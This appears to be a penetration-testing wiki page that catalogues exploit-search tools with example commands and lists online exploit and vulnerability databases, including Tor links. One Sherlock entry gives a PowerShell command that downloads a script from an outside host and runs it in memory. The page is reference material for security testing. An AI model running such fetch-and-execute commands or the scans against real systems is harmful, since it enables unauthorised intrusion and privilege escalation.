====== Exploit and Vulnerability Databases ======

**offline:**

  * A tool like searchsploit that also searches exploit-db and https://github.com/nomi-sec/PoC-in-GitHub: https://github.com/usdAG/search_vulns
  * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf
    * -> git clone https://github.com/offensive-security/exploit-database.git
    * -> apt update && apt -y install exploitdb
    * -> searchsploit -u  # update the local database
    * -> searchsploit "linux Kernel" --exclude="(PoC)|/dos/"  # example
    * -> searchsploit apache mod_ssl  # other example
    * -> searchsploit -m 7618  # copy the exploit into the current directory
    * -> searchsploit -p 7618[.c]  # show the complete path
    * -> searchsploit -x 7618[.c]  # open vi to inspect the exploit
    * -> searchsploit --nmap file.xml  # search for vulns inside an nmap XML result
    * -> searchsploit openssh 3 --color | grep -i 'openssh 3.'  # this example filters the result
    * -> nmap --min-rate 200 -p- 10.10.10.93 -oX resultat.xml
    * -> searchsploit -x --nmap resultat.xml
  * MSF-Search
    * -> msf> search platform:windows port:135 target:XP type:exploit
  * Nmap vulners
    * -> nmap --script nmap-vulners -sV 127.0.0.1 -p 443
  * Nmap vuln
    * -> nmap -Pn -n -sV -oN vulnnmapoutput.txt --script vuln 127.0.0.1
  * Sherlock, a PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
    * -> https://github.com/rasta-mouse/Sherlock
    * -> powershell "IEX(New-Object Net.Webclient).downloadString('http://10.10.14.13:3001/Sherlock.ps1'); Find-AllVulns"
    * -> wait a few minutes
  * Windows Exploit Suggester
    * -> git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
    * -> pip install xlrd --upgrade
    * -> apt install python3-xlrd
    * -> ./windows-exploit-suggester.py --update
    * -> python windows-exploit-suggester.py --database 2020-07-27-mssb.xls --systeminfo sysinfo.txt
  * Windows Exploit Suggester - Next Generation (WES-NG)
    * -> git clone https://github.com/bitsadmin/wesng.git
    * -> python wes.py --update
    * -> python wes.py sysinfoTarget.txt
    * List only vulnerabilities with exploits, excluding IE, Edge and Flash
      * -> wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash
      * -> wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash
    * Only show vulnerabilities of a certain impact
      * -> wes.py systeminfo.txt --impact "Remote Code Execution"
      * -> wes.py systeminfo.txt -i "Remote Code Execution"
      * -> wes.py systeminfo.txt -i "Elevation of Privilege"
    * Only show vulnerabilities of a certain severity
      * -> wes.py systeminfo.txt --severity critical important
      * -> wes.py systeminfo.txt -s critical
  * Linux Exploit Suggester 2
    * -> git clone https://github.com/jondonas/linux-exploit-suggester-2
  * LES: Linux privilege escalation auditing tool
    * -> git clone https://github.com/mzet-/linux-exploit-suggester

**online:**

  * https://cn-sec.com/?s=CVE
  * https://snyk.io/vuln
  * http://www.securityfocus.com/
  * https://www.cvedetails.com/
  * https://www.exploit-db.com/
  * https://www.exploit-db.com/google-hacking-database/
  * google
    * -> firefox --search "Microsoft Edge site:exploit-db.com"
    * -> firefox --search "Microsoft Edge site:exploit-db.com" inurl:exploits intext:remote intitle:Browser
  * https://srcincite.io/exploits/
  * https://www.exploitalert.com/
  * https://github.com/qazbnm456/awesome-cve-poc
  * https://github.com/yeahhub/awesome-cve-poc
  * https://vulners.com/
  * https://sploitus.com/
    * -> https://github.com/rejoinder/sploitus-search
    * -> https://github.com/0xricksanchez/sploitGET
    * -> https://github.com/si9int/sploitus.py
  * https://www.github.com/
  * pastebin.com
    * -> http://pastehits.blogspot.com/2013/03/pastebincom-custom-search.html
    * -> https://pastebeen.com
    * -> https://psbdmp.cc/ https://psbdmp.ws/
  * Tor
    * -> http://xmh57jrzrnw6insl.onion/
    * -> http://hss3uro2hsxfogfq.onion/
    * -> http://gjobqjj7wyczbqie.onion/
    * -> https://ahmia.fi/
  * https://threatpost.com/
  * https://www.deepdotweb.com/
  * https://packetstormsecurity.com/
  * http://routerpwn.com/
  * https://www.rapid7.com/db/
  * http://0day.today/ **not recommended** [[https://forum.zenk-security.com/showthread.php?tid=2590|forum thread]]
  * https://cve.mitre.org/cve/
  * http://www.exploitalert.com
  * http://www.vulnerability-lab.com
  * http://it.0day.today
  * https://nvd.nist.gov
  * http://osvdb.org
  * https://cxsecurity.com
  * https://www.kb.cert.org/vuls
  * https://secunia.com/community/advisories/search/
  * http://lwn.net/Vulnerabilities/
  * https://www.owasp.org/index.php/Category:Vulnerability
  * http://xforce.iss.net
  * http://www.us-cert.gov/cas/techalerts/
  * http://www.securiteam.com
  * http://lab.mediaservice.net
  * http://www.intelligentexploit.com
  * https://wpvulndb.com/
  * http://repwn.com/wiki.html
  * https://www.vulncode-db.com/ Vulncode-DB is a database of vulnerabilities and their corresponding source code, where available.
  * https://cveapi.com/ cveapi: free API for CVE data.
  * http://securityvulns.com/
  * http://insecure.org/sploits_all.html
  * http://zerodayinitiative.com/advisories/published/
  * http://nmrc.org/pub/index.html
  * http://oval.mitre.org

**Finding more information regarding the exploit**

  * http://www.cvedetails.com
  * http://packetstormsecurity.org/files/cve/[CVE]
  * http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
  * http://www.vulnview.com/cve-details.php?cvename=[CVE]